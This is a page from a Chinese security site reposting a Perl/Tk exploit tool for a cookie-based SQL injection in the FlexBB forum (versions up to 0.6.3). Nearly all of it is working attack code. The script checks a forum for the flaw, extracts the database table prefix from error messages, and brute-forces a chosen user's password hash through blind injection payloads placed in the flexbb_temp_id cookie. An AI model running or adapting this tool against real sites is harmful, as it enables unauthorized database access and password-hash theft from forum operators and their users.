首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 FlexBB <= 0.6.3 Cookies Remote SQL Injection Exploit 来源：www.vfocus.net 作者：Tahoma 发布时间：2008-01-08   #!/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "UnderWHAT?!" ); $mw->geometry ( '420x343' ) ; $mw->resizable(0,0); $mw->Label(-text => '', -font => '{Verdana} 8',-foreground=>'red')->pack(); $mw->Label(-text => 'FlexBB <= 0.6.3 Cookies Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => 'it will take about half an hour to get hashed password', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => 'you need magic_quotes_gpc turned off and mysql version higher that 4.1', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack(); $mw->Label(-text => '', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack(); $fleft  = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; $fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; $url      = 'http://test2.ru/flexbb v0.6.3 beta/'; $user_id  = '1'; $prefix   = 'flexbb_'; $table    = 'users'; $column   = 'user_password'; $report   = ''; $group    = 1; $curr_user = 0; $fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Returned hash: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fright->Button(-text    => 'Test forum vulnerability',                 -relief => "groove",                 -width => '30',                 -font => '{Verdana} 8 bold',                 -activeforeground => 'red',                 -command => \&test_vuln                )->pack(); $fright->Button(-text    => 'Get database tables prefix',                 -relief => "groove",                 -width => '30',                 -font => '{Verdana} 8 bold',                 -activeforeground => 'red',                 -command => \&get_prefix                )->pack(); $fright->Button(-text    => 'Get hash from database',                 -relief => "groove",                 -width => '30',                 -font => '{Verdana} 8 bold',                 -activeforeground => 'red',                 -command => \&get_hash                )->pack();       $mw   ->Label(-text => '', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => '!', -font => '{Webdings} 22')->pack(); $fleft->Label(-text => 'FlexBB 0.6.3', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => 'cookie sql injection ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => 'mysql char bruteforcing ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => 'bug in template function ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => 'by gemaglabin and Elekt  ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => '( mafia of antichat.ru ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fleft->Label(-text => ' 2007.02.04 ( fixed ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack(); $fright->Label(-text => '', -font => '{Verdana} 3 bold',-foreground=>'red')->pack(); $print=$fright->Text(-width=>35,-height=>5,-wrap=>"word")->pack(-side=>"top",-anchor=>"s"); MainLoop(); sub get_hash() { srand(); $xpl = LWP::UserAgent->new( ) or die; $InfoWindow=$mw->DialogBox(-title   => 'get hash from database', -buttons => ["OK"]); $i = 1; $b = 0; $report = ''; my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time); $print->insert('end',"- Start [$hour:$min:$sec]\n"); my @brutearray=qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102); while (length($report)<32) { $num = $brutearray[$b]; $ret = get_pchar(); if($ret > 0) { $print->insert('end',"- char [$num] = ".chr($num)."\n"); $report .= chr($num); $b = 0; $i = $i +1; $mw->update(); break; } else { $b = $b +1; } } my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time); $print->insert('end',"- Finish [$hour:$min:$sec]"); } sub get_pchar() { $res = $xpl->get($url,'Cookie'=>"flexbb_temp_id=1' and 1=if(ascii(substring((select password from ".$prefix."users where id=$user_id),$i,1))=$num,1,(select 1 union select 2))/*"); if($res->as_string =~ /more than/i) { return 0;} else {return 1;} } sub test_vuln() { $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url,'Cookie'=>"flexbb_temp_id='"); if($res->is_success) { $rep = ''; if($res->as_string =~ /MySQL Query/i) { $print->insert('end',"- FORUM VULNERABLE\n"); } else { $print->insert('end',"- FORUM UNVULNERABLE\n");} } } sub get_prefix() { $InfoWindow=$mw->DialogBox(-title   => 'get database tables prefix', -buttons => ["OK"]); $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $xpl = LWP::UserAgent->new( ) or die; $res = $xpl->get($url,'Cookie'=>"flexbb_temp_id='"); if($res->is_success) { $rep = ''; if($res->as_string =~ /FROM `(.*)templates/) { $prefix = $1; $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack; } else { $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; } } else { $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack; } $InfoWindow->Show(); $InfoWindow->destroy;   }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Half-Life CSTRIKE Server 1.6 D ·Eggblog <= 3.1.0 Cookies Remot ·DCP-Portal <= 6.11 Remote SQL ·ClamAV 0.91.2 libclamav MEW PE ·Site@School <= 2.3.10 Remote B ·Microsoft DirectX SAMI File Pa ·MyPHP Forum <= 3.0 (Final) Rem ·PHP Webquest 2.6 (id_actividad ·DivX Player 6.6.0 ActiveX SetP ·Move Networks Quantum Streamin ·WebPortal CMS <= 0.6.0 (index. ·Gateway Weblaunch ActiveX Cont   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved